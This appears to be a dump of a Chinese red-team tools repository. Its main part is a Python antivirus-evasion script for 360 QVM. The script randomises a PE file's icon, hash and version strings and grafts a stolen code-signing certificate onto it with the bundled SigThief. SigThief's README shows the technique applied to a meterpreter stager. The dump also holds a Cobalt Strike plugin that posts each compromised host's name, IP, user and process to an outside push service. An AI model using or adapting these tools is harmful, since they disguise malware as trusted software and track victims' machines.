├── 360QVM_bypass1.1
    ├── README.md
    ├── ResourceHacker.exe
    ├── ResourceHacker.ini
    ├── icon-exe.py
    ├── pdf.ico
    ├── rcedit.exe
    ├── requirements.txt
    └── sigthief
    │   ├── LICENSE
    │   ├── README.md
    │   └── sigthief.py
├── CS插件
    ├── PushPlus2
    │   ├── PushPlus.py
    │   └── PushPlus2.cna
    └── README.md
├── GoFilebundling
    ├── GoFilebundling1.1.exe
    ├── README.md
    └── init.bat
└── README.md


/360QVM_bypass1.1/README.md:
--------------------------------------------------------------------------------
 1 | # 360QVM_bypass二开
 2 | * 随机文件名
 3 | * 随机文件信息
 4 | * 加上sigthief签名窃取功能
 5 | 
 6 | 帮助：
 7 | `python3 icon-exe.py -h`
 8 | ```
 9 | Author:pant0m & Hyyrent 修改版 v 1.3
10 | 
11 | usage: icon-exe.py [-h] -f INPUT_ICON_FILE [-n NUM_ICONS] [-maxc MAX_COLOR_CHANGE] -i INPUTFILE -s SIGTHIEF
12 | 
13 | 默认会生成带签名和不带签名的文件。
14 | 
15 | options:
16 |   -h, --help            show this help message and exit
17 |   -f INPUT_ICON_FILE, --file INPUT_ICON_FILE
18 |                         输入ICO文件。
19 |   -n NUM_ICONS, --number NUM_ICONS
20 |                         要生成的图标数量。
21 |   -maxc MAX_COLOR_CHANGE, --maxcolorchange MAX_COLOR_CHANGE
22 |                         最大颜色变化范围。
23 |   -i INPUTFILE, --inputfile INPUTFILE
24 |                         输入目标PE文件。
25 |   -s SIGTHIEF, --sigthief SIGTHIEF
26 |                         输入要伪造签名exe路径。(必填)
27 | ```
28 | 
29 | 使用：
30 | `python3 icon-exe.py -i calc.exe -f pdf.ico -n 1 -s EALauncher.exe`
31 | 
32 | ![image](https://github.com/user-attachments/assets/78f5a6dc-8a8c-4cd3-95f8-821951795bda)
33 | 
34 | 二开自项目：[360QVM_bypass](https://github.com/Pizz33/360QVM_bypass)，感谢hyyrent师傅的项目。
35 | 
36 | 


--------------------------------------------------------------------------------
/360QVM_bypass1.1/ResourceHacker.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/my_script_tools/041c68a0325e9e20ffccec76eb0a1d6fc444346d/360QVM_bypass1.1/ResourceHacker.exe


--------------------------------------------------------------------------------
/360QVM_bypass1.1/ResourceHacker.ini:
--------------------------------------------------------------------------------
 1 | [MRU List]
 2 | 
 3 | [Setup]
 4 | left=477
 5 | top=262
 6 | width=800
 7 | height=440
 8 | MaximizedState=0
 9 | MenuEditMode=0
10 | DisableGridlines=0
11 | vsplit=200
12 | LastDir=C:\Windows\System32
13 | ToolbarSize=1
14 | 
15 | [MonospaceFont]
16 | Name=Courier New
17 | Size=9
18 | Color=-16777208
19 | Style=0
20 | 
21 | [Font]
22 | Name=Tahoma
23 | Size=9
24 | Color=-16777208
25 | CharSet=1
26 | Style=0
27 | 
28 | 


--------------------------------------------------------------------------------
/360QVM_bypass1.1/icon-exe.py:
--------------------------------------------------------------------------------
  1 | import subprocess
  2 | from PIL import Image, ImageChops
  3 | import random
  4 | import os
  5 | import argparse
  6 | import string
  7 | 
  8 | def add_alpha_channel(image, color=(255, 255, 255)):
  9 |     if image.mode == "RGB":
 10 |         # 创建一个具有透明通道的新图像
 11 |         alpha_img = Image.new("L", image.size, 255)
 12 |         image = Image.merge("RGBA", (image, alpha_img))
 13 | 
 14 |         # 将背景色变为透明
 15 |         bg = Image.new("RGBA", image.size, color + (255,))
 16 |         diff = ImageChops.difference(image, bg)
 17 |         diff = ImageChops.add(diff, diff, 2.0, -100)
 18 |         bbox = diff.getbbox()
 19 |         if bbox:
 20 |             return image.crop(bbox)
 21 |     return image
 22 | 
 23 | def modify_icon_color(input_file, output_file, max_color_change):
 24 |     # 读取.ico文件
 25 |     img = Image.open(input_file)
 26 | 
 27 |     # 获取图像的RGB数据，并添加透明通道
 28 |     pixels = img.convert("RGBA")
 29 |     pixels = add_alpha_channel(pixels)
 30 | 
 31 |     # 保存原始图标尺寸信息
 32 |     original_sizes = img.info.get("sizes")
 33 | 
 34 |     # 遍历每个像素点
 35 |     for y in range(pixels.height):
 36 |         for x in range(pixels.width):
 37 |             r, g, b, a = pixels.getpixel((x, y))
 38 | 
 39 |             # 随机修改RGB颜色
 40 |             r_change = random.randint(-max_color_change, max_color_change)
 41 |             g_change = random.randint(-max_color_change, max_color_change)
 42 |             b_change = random.randint(-max_color_change, max_color_change)
 43 | 
 44 |             r = max(0, min(255, r + r_change))
 45 |             g = max(0, min(255, g + g_change))
 46 |             b = max(0, min(255, b + b_change))
 47 | 
 48 |             # 更新像素值
 49 |             pixels.putpixel((x, y), (r, g, b, a))
 50 |             
 51 | 
 52 | 
 53 |     # 保存修改后的图像为.ico文件，并保留原始图标尺寸信息
 54 |     pixels.save(output_file, format="ICO", sizes=original_sizes, append_images=[Image.new("RGBA", (1, 1), (0, 0, 0, 0))])
 55 |     # 添加随机字节以生成不同的哈希值
 56 |     with open(output_file, "ab") as f:
 57 |         f.write(os.urandom(random.randint(500, 1024)))
 58 | 
 59 | 
 60 | def generate_random_filename():
 61 |     return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + ".ico"
 62 | 
 63 | def add_icon_to_exe(icon_file, exe_file, output_file):
 64 |     command = f'ResourceHacker -open "{exe_file}" -save "{output_file}" -action addskip -res "{icon_file}" -mask ICONGROUP,MAINICON,'
 65 |     subprocess.run(command, shell=True)
 66 | 
 67 | def generate_random_version():
 68 |     # 生成随机版本号，格式为 X.Y.Z.W
 69 |     return f"{random.randint(2, 9)}.{random.randint(2, 9)}.{random.randint(2, 9)}.{random.randint(2, 9)}"
 70 | 
 71 |     #生成随机软件名
 72 | def generate_software_name():
 73 |     software_names = [
 74 |         "Word", "Excel", "PowerPoint", "Access", "Publisher",
 75 |         "Outlook", "OneNote", "Photoshop", "Illustrator", "Premiere",
 76 |         "AfterEffects", "Audition", "Lightroom", "FinalCut",
 77 |         "Logic", "ProTools", "Ableton", "GarageBand", "Reaper",
 78 |         "Adobe", "Autodesk", "Corel", "GraphicRiver", "Infuse",
 79 |         "Pixlr", "PixlrX", "PixlrE", "PixlrStudio", "PixlrEssentials",
 80 |         "PixlrExpress", "PixlrPro", "PixlrPremium", "PixlrUltimate",
 81 |         "PixlrCreativeCloud", "PixlrCreativeSuite", "PixlrCreativePack",
 82 |         "PixlrCreativeBundle", "PixlrCreativeAlliance", "PixlrCreativeEnterprise",
 83 |         "PixlrCreativeUnlimited", "PixlrCreativeInfinity", "PixlrCreativeImagination",
 84 |         "PixlrCreativeWonder", "PixlrCreativeLegend"
 85 |     ]
 86 | 
 87 |     random_words = [
 88 |         "Editor", "Viewer", "Manager", "Processor", "Analyzer",
 89 |         "Conductor", "Composer", "Designer", "Developer", "Engineer",
 90 |         "Architect", "Constructor", "Planner", "Programmer", "Coder",
 91 |         "Cracker", "Breaker", "Encrypter", "Decrypter",
 92 |         "Cryptographer", "Solver", "Optimizer", "Simulator", "Mapper",
 93 |         "Reducer", "Expander", "Compressor", "Decompressor", "Converter",
 94 |         "Translator", "Interpreter", "Compiler", "Assembler", "Disassembler",
 95 |         "Debugger", "Profiler", "Tester", "Analyst", "Reviewer",
 96 |         "Maker", "Builder", "Breeder", "Creator", "Designer",
 97 |         "Developer", "Engineer", "Architect", "Constructor", "Planner",
 98 |         "Programmer", "Coder", "Hacker", "Cracker", "Breaker",
 99 |         "Encrypter", "Decrypter", "Cryptographer", "Solver", "Optimizer",
100 |         "Simulator", "Mapper", "Reducer", "Expander", "Compressor",
101 |         "Decompressor", "Converter", "Translator", "Interpreter", "Compiler",
102 |         "Assembler", "Disassembler", "Debugger", "Profiler", "Tester",
103 |         "Analyst", "Reviewer", "Maker", "Builder", "Breeder",
104 |         "Creator", "Designer", "Developer", "Engineer", "Architect",
105 |         "Constructor", "Planner", "Programmer", "Coder", "Hacker",
106 |         "Cracker", "Breaker", "Encrypter", "Decrypter", "Cryptographer",
107 |         "Solver", "Optimizer", "Simulator", "Mapper", "Reducer",
108 |         "Expander", "Compressor", "Decompressor", "Converter", "Translator",
109 |         "Interpreter", "Compiler", "Assembler", "Disassembler", "Debugger",
110 |         "Profiler", "Tester", "Analyst", "Reviewer"
111 |     ]
112 | 
113 |     software_name = random.choice(software_names) + " " + random.choice(random_words)
114 |     return software_name
115 | 
116 | def add_version_info(exe_file):
117 |     # 使用rcedit工具为exe文件添加版本信息
118 |     file_version = generate_random_version()
119 |     product_version = generate_random_version()
120 |     software_name = generate_software_name()
121 |     """
122 |     --set-file-version      文件版本
123 |     --set-product-version   产品版本
124 |     --set-version-string ProductName "EA" 产品名称
125 |     --set-version-string FileDescription "EA Inc."  文件说明
126 |     --set-version-string LegalCopyright "Copyright (c) 2024"     版权
127 |     """
128 |     command = f'rcedit "{exe_file}" --set-file-version "{file_version}" --set-product-version "{product_version}" --set-version-string FileDescription "{software_name}, Inc." --set-version-string ProductName "{software_name}" --set-version-string LegalCopyright "Copyright (c) 2024"  '
129 |     subprocess.run(command, shell=True)
130 | 
131 | def add_sign_info(exe_sign, exe_file):
132 |     # 使用sigthief工具为exe文件添加签名
133 |     output_exe_file = f"output\{getstrRandom()}.exe"
134 |     command = f'python sigthief\sigthief.py -i "{exe_sign}" -t "{exe_file}" -o "{output_exe_file}"'
135 |     subprocess.run(command, shell=True)
136 | 
137 | def getstrRandom():
138 |     # 生成随机6位字符串
139 |     seed = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
140 |     sa = []
141 |     for i in range(6):
142 |         sa.append(random.choice(seed))
143 |     strRandom = ''.join(sa)
144 |     return strRandom
145 | 
146 | def generate_icons(input_icon_file, num_icons, max_color_change,inputfile,sigthief):
147 |     exe_file = inputfile
148 |     generated_icon_files = []
149 | 
150 |     # 创建output文件夹
151 |     if not os.path.exists("output"):
152 |         os.makedirs("output")
153 | 
154 |     for i in range(num_icons):
155 |         output_icon_file = generate_random_filename()
156 |         modify_icon_color(input_icon_file, output_icon_file, max_color_change)
157 |         output_exe_file = f"output/{getstrRandom()}.exe"  # 将生成的exe文件放入output文件夹
158 |         add_icon_to_exe(output_icon_file, exe_file, output_exe_file)
159 |         add_version_info(output_exe_file)  # 为每个生成的exe文件添加版本信息
160 |         add_sign_info(sigthief,output_exe_file)
161 |         # 将生成的图标文件名添加到列表中
162 |         generated_icon_files.append(output_icon_file)
163 |         print(f"生成第 {i+1} 个图标并添加到 {output_exe_file}")
164 | 
165 |     # 删除生成的.ico文件
166 |     for icon_file in generated_icon_files:
167 |         os.remove(icon_file)
168 | 
169 | def logo():
170 |     logo='''
171 | Author:pant0m & Hyyrent 修改版 v 1.3
172 |     '''
173 |     return logo
174 | 
175 | if __name__ == "__main__":
176 |     print(logo())
177 |     parser = argparse.ArgumentParser(description="默认会生成带签名和不带签名的文件。")
178 |     parser.add_argument("-f", "--file", dest="input_icon_file", required=True, help="输入ICO文件。")
179 |     parser.add_argument("-n", "--number", dest="num_icons", type=int, default=5, help="要生成的图标数量。")
180 |     parser.add_argument("-maxc", "--maxcolorchange", dest="max_color_change", type=int, default=5, help="最大颜色变化范围。")
181 |     parser.add_argument("-i", "--inputfile", dest="inputfile", required=True, help="输入目标PE文件。")
182 |     parser.add_argument("-s", "--sigthief", dest="sigthief", required=True, help="输入要伪造签名exe路径。(必填)")
183 |     args = parser.parse_args()
184 | 
185 | 
186 |     # 使用我们定义的函数生成图标并添加到test.exe中
187 |     generate_icons(args.input_icon_file, args.num_icons, args.max_color_change, args.inputfile, args.sigthief)
188 | 


--------------------------------------------------------------------------------
/360QVM_bypass1.1/pdf.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/my_script_tools/041c68a0325e9e20ffccec76eb0a1d6fc444346d/360QVM_bypass1.1/pdf.ico


--------------------------------------------------------------------------------
/360QVM_bypass1.1/rcedit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/my_script_tools/041c68a0325e9e20ffccec76eb0a1d6fc444346d/360QVM_bypass1.1/rcedit.exe


--------------------------------------------------------------------------------
/360QVM_bypass1.1/requirements.txt:
--------------------------------------------------------------------------------
1 | pillow


--------------------------------------------------------------------------------
/360QVM_bypass1.1/sigthief/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2017, Josh Pitts
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | * Redistributions of source code must retain the above copyright notice, this
10 |   list of conditions and the following disclaimer.
11 | 
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 |   this list of conditions and the following disclaimer in the documentation
14 |   and/or other materials provided with the distribution.
15 | 
16 | * Neither the name of the copyright holder nor the names of its
17 |   contributors may be used to endorse or promote products derived from
18 |   this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/360QVM_bypass1.1/sigthief/README.md:
--------------------------------------------------------------------------------
 1 | # SigThief
 2 | 
 3 | New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
 4 | 
 5 | Stable tier will have it End of Month August 2021
 6 | 
 7 | ---
 8 | Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
 9 | https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
10 | 
11 | https://twitter.com/subTee/status/912769644473098240
12 | ![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
13 | 
14 | ## For security professionals only...
15 | 
16 | ## What is this?
17 | 
18 | I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
19 | 
20 | So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
21 | 
22 | In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
23 | 
24 | Of course it's **not a valid signature** and that's the point!
25 | 
26 | I look forward to hearing about your results!
27 | 
28 | 
29 | ## How to use
30 | 
31 | ### Usage
32 | ```
33 | Usage: sigthief.py [options]
34 | 
35 | Options:
36 |   -h, --help            show this help message and exit
37 |   -i FILE, --file=FILE  input file
38 |   -r, --rip             rip signature off inputfile
39 |   -a, --add             add signautre to targetfile
40 |   -o OUTPUTFILE, --output=OUTPUTFILE
41 |                         output file
42 |   -s SIGFILE, --sig=SIGFILE
43 |                         binary signature from disk
44 |   -t TARGETFILE, --target=TARGETFILE
45 |                         file to append signature too
46 |   -c, --checksig        file to check if signed; does not verify signature
47 |   -T, --truncate        truncate signature (i.e. remove sig)
48 | ```
49 | 
50 | ### Take a Signature from a binary and add it to another binary
51 | ```
52 | $ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
53 | Output file: /tmp/msftesting_tcpview.exe
54 | Signature appended. 
55 | FIN.
56 | ```
57 | 
58 | ### Save Signature to disk for use later
59 | ```
60 | $ ./sigthief.py -i tcpview.exe -r                                                        
61 | Ripping signature to file!
62 | Output file: tcpview.exe_sig
63 | Signature ripped. 
64 | FIN.
65 | 
66 | ```
67 | 
68 | ### Use the ripped signature
69 | ```
70 | $ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
71 | Output file: x86_meterpreter_stager.exe_signed
72 | Signature appended. 
73 | FIN.
74 | 
75 | ```
76 | 
77 | ### Truncate (remove) signature
78 | This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
79 | 
80 | ```
81 | $ ./sigthief.py -i tcpview.exe -T    
82 | Inputfile is signed!
83 | Output file: tcpview.exe_nosig
84 | Overwriting certificate table pointer and truncating binary
85 | Signature removed. 
86 | FIN.
87 | ```
88 | 
89 | ### Check if there is a signature (does not check validity)
90 | ```
91 | $ ./sigthief.py -i tcpview.exe -c
92 | Inputfile is signed!
93 | ```
94 | 


--------------------------------------------------------------------------------
/360QVM_bypass1.1/sigthief/sigthief.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # LICENSE: BSD-3
  3 | # Copyright: Josh Pitts @midnite_runr
  4 | 
  5 | import sys
  6 | import struct
  7 | import shutil
  8 | import io
  9 | from optparse import OptionParser
 10 | 
 11 | 
 12 | def gather_file_info_win(binary):
 13 |         """
 14 |         Borrowed from BDF...
 15 |         I could just skip to certLOC... *shrug*
 16 |         """
 17 |         flItms = {}
 18 |         binary = open(binary, 'rb')
 19 |         binary.seek(int('3C', 16))
 20 |         flItms['buffer'] = 0
 21 |         flItms['JMPtoCodeAddress'] = 0
 22 |         flItms['dis_frm_pehdrs_sectble'] = 248
 23 |         flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
 24 |         # Start of COFF
 25 |         flItms['COFF_Start'] = flItms['pe_header_location'] + 4
 26 |         binary.seek(flItms['COFF_Start'])
 27 |         flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
 28 |         binary.seek(flItms['COFF_Start'] + 2, 0)
 29 |         flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
 30 |         flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
 31 |         binary.seek(flItms['COFF_Start'] + 16, 0)
 32 |         flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
 33 |         flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
 34 |         #End of COFF
 35 |         flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
 36 | 
 37 |         #if flItms['SizeOfOptionalHeader']:
 38 |             #Begin Standard Fields section of Optional Header
 39 |         binary.seek(flItms['OptionalHeader_start'])
 40 |         flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
 41 |         flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
 42 |         flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
 43 |         flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
 44 |         flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
 45 |         flItms['SizeOfUninitializedData'] = struct.unpack("<I",
 46 |                                                                binary.read(4))[0]
 47 |         flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
 48 |         flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
 49 |         flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
 50 |         if flItms['Magic'] != 0x20B:
 51 |             flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
 52 |         # End Standard Fields section of Optional Header
 53 |         # Begin Windows-Specific Fields of Optional Header
 54 |         if flItms['Magic'] == 0x20B:
 55 |             flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
 56 |         else:
 57 |             flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
 58 |         flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
 59 |         flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
 60 |         flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
 61 |                                                                    binary.read(2))[0]
 62 |         flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
 63 |                                                                    binary.read(2))[0]
 64 |         flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
 65 |         flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
 66 |         flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
 67 |         flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
 68 |         flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
 69 |         flItms['SizeOfImageLoc'] = binary.tell()
 70 |         flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
 71 |         flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
 72 |         flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
 73 |         flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
 74 |         flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
 75 |         if flItms['Magic'] == 0x20B:
 76 |             flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
 77 |             flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
 78 |             flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
 79 |             flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
 80 | 
 81 |         else:
 82 |             flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
 83 |             flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
 84 |             flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
 85 |             flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
 86 |         flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
 87 |         flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
 88 |         # End Windows-Specific Fields of Optional Header
 89 |         # Begin Data Directories of Optional Header
 90 |         flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
 91 |         flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
 92 |         flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
 93 |         #ImportTable SIZE|LOC
 94 |         flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
 95 |         flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
 96 |         flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
 97 |         flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
 98 |         flItms['CertTableLOC'] = binary.tell()
 99 |         flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
100 |         flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
101 |         binary.close()
102 |         return flItms
103 | 
104 | 
105 | def copyCert(exe):
106 |     flItms = gather_file_info_win(exe)
107 | 
108 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
109 |         # not signed
110 |         print("Input file Not signed!")
111 |         sys.exit(-1)
112 | 
113 |     with open(exe, 'rb') as f:
114 |         f.seek(flItms['CertLOC'], 0)
115 |         cert = f.read(flItms['CertSize'])
116 |     return cert
117 | 
118 | 
119 | def writeCert(cert, exe, output):
120 |     flItms = gather_file_info_win(exe)
121 |     
122 |     if not output: 
123 |         output = output = str(exe) + "_signed"
124 | 
125 |     shutil.copy2(exe, output)
126 |     
127 |     print("Output file: {0}".format(output))
128 | 
129 |     with open(exe, 'rb') as g:
130 |         with open(output, 'wb') as f:
131 |             f.write(g.read())
132 |             f.seek(0)
133 |             f.seek(flItms['CertTableLOC'], 0)
134 |             f.write(struct.pack("<I", len(open(exe, 'rb').read())))
135 |             f.write(struct.pack("<I", len(cert)))
136 |             f.seek(0, io.SEEK_END)
137 |             f.write(cert)
138 | 
139 |     print("Signature appended. \nFIN.")
140 | 
141 | 
142 | def outputCert(exe, output):
143 |     cert = copyCert(exe)
144 |     if not output:
145 |         output = str(exe) + "_sig"
146 | 
147 |     print("Output file: {0}".format(output))
148 | 
149 |     open(output, 'wb').write(cert)
150 | 
151 |     print("Signature ripped. \nFIN.")
152 | 
153 | 
154 | def check_sig(exe):
155 |     flItms = gather_file_info_win(exe)
156 |  
157 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
158 |         # not signed
159 |         print("Inputfile Not signed!")
160 |     else:
161 |         print("Inputfile is signed!")
162 | 
163 | 
164 | def truncate(exe, output):
165 |     flItms = gather_file_info_win(exe)
166 |  
167 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
168 |         # not signed
169 |         print("Inputfile Not signed!")
170 |         sys.exit(-1)
171 |     else:
172 |         print( "Inputfile is signed!")
173 | 
174 |     if not output:
175 |         output = str(exe) + "_nosig"
176 | 
177 |     print("Output file: {0}".format(output))
178 | 
179 |     shutil.copy2(exe, output)
180 | 
181 |     with open(output, "r+b") as binary:
182 |         print('Overwriting certificate table pointer and truncating binary')
183 |         binary.seek(-flItms['CertSize'], io.SEEK_END)
184 |         binary.truncate()
185 |         binary.seek(flItms['CertTableLOC'], 0)
186 |         binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
187 | 
188 |     print("Signature removed. \nFIN.")
189 | 
190 | 
191 | def signfile(exe, sigfile, output):
192 |     flItms = gather_file_info_win(exe)
193 |     
194 |     cert = open(sigfile, 'rb').read()
195 | 
196 |     if not output: 
197 |         output = output = str(exe) + "_signed"
198 | 
199 |     shutil.copy2(exe, output)
200 |     
201 |     print("Output file: {0}".format(output))
202 |     
203 |     with open(exe, 'rb') as g:
204 |         with open(output, 'wb') as f:
205 |             f.write(g.read())
206 |             f.seek(0)
207 |             f.seek(flItms['CertTableLOC'], 0)
208 |             f.write(struct.pack("<I", len(open(exe, 'rb').read())))
209 |             f.write(struct.pack("<I", len(cert)))
210 |             f.seek(0, io.SEEK_END)
211 |             f.write(cert)
212 |     print("Signature appended. \nFIN.")
213 | 
214 | 
215 | if __name__ == "__main__":
216 |     usage = 'usage: %prog [options]'
217 |     print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
218 |     parser = OptionParser()
219 |     parser.add_option("-i", "--file", dest="inputfile", 
220 |                   help="input file", metavar="FILE")
221 |     parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
222 |                   help='rip signature off inputfile')
223 |     parser.add_option('-a', '--add', dest='addsig', action='store_true',
224 |                   help='add signautre to targetfile')
225 |     parser.add_option('-o', '--output', dest='outputfile',
226 |                   help='output file')
227 |     parser.add_option('-s', '--sig', dest='sigfile',
228 |                   help='binary signature from disk')
229 |     parser.add_option('-t', '--target', dest='targetfile',
230 |                   help='file to append signature to')
231 |     parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
232 |                   help='file to check if signed; does not verify signature')
233 |     parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
234 |                   help='truncate signature (i.e. remove sig)')
235 |     (options, args) = parser.parse_args()
236 |     
237 |     # rip signature
238 |     # inputfile and rip to outputfile
239 |     if options.inputfile and options.ripsig:
240 |         print("Ripping signature to file!")
241 |         outputCert(options.inputfile, options.outputfile)
242 |         sys.exit()    
243 | 
244 |     # copy from one to another
245 |     # inputfile and rip to targetfile to outputfile    
246 |     if options.inputfile and options.targetfile:
247 |         cert = copyCert(options.inputfile)
248 |         writeCert(cert, options.targetfile, options.outputfile)
249 |         sys.exit()
250 | 
251 |     # check signature
252 |     # inputfile 
253 |     if options.inputfile and options.checksig:
254 |         check_sig(options.inputfile) 
255 |         sys.exit()
256 | 
257 |     # add sig to target file
258 |     if options.targetfile and options.sigfile:
259 |         signfile(options.targetfile, options.sigfile, options.outputfile)
260 |         sys.exit()
261 |         
262 |     # truncate
263 |     if options.inputfile and options.truncate:
264 |         truncate(options.inputfile, options.outputfile)
265 |         sys.exit()
266 | 
267 |     parser.print_help()
268 |     parser.error("You must do something!")
269 | 
270 | 


--------------------------------------------------------------------------------
/CS插件/PushPlus2/PushPlus.py:
--------------------------------------------------------------------------------
 1 | # encoding:utf-8
 2 | import argparse
 3 | import requests
 4 | import random
 5 | import string
 6 | import json
 7 | 
 8 | 
 9 | token = 'xxxxxxxxxxxxxxxxxxxxxxxx' #在 http://www.pushplus.plus/push1.html 复制
10 | 
11 | parser = argparse.ArgumentParser(description='Beacon Info')
12 | parser.add_argument('--computername')
13 | parser.add_argument('--internalip')
14 | parser.add_argument('--username')
15 | parser.add_argument('--process')
16 | args = parser.parse_args()
17 | 
18 | internalip = args.internalip
19 | computername = args.computername
20 | username = args.username
21 | process = args.process
22 | ran_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))
23 | 
24 | title = "测试"
25 | content = """
26 | 
27 | **主机已上线**
28 | 
29 | **主机名: {}**
30 | 
31 | **IP: {}**
32 | 
33 | **用户名: {}**
34 | 
35 | **进程: {}**
36 | 
37 | **Token: {}**
38 | 
39 | """.format(computername, internalip, username, process, ran_str)
40 | 
41 | url = 'http://www.pushplus.plus/send'
42 | data = {
43 |     "token":token,
44 |     "title":title,
45 |     "content":content,
46 |     "template":"markdown",
47 |     "channel":"wechat"
48 | }
49 | body=json.dumps(data).encode(encoding='utf-8')
50 | headers = {'Content-Type':'application/json'}
51 | requests.post(url,data=body,headers=headers)


--------------------------------------------------------------------------------
/CS插件/PushPlus2/PushPlus2.cna:
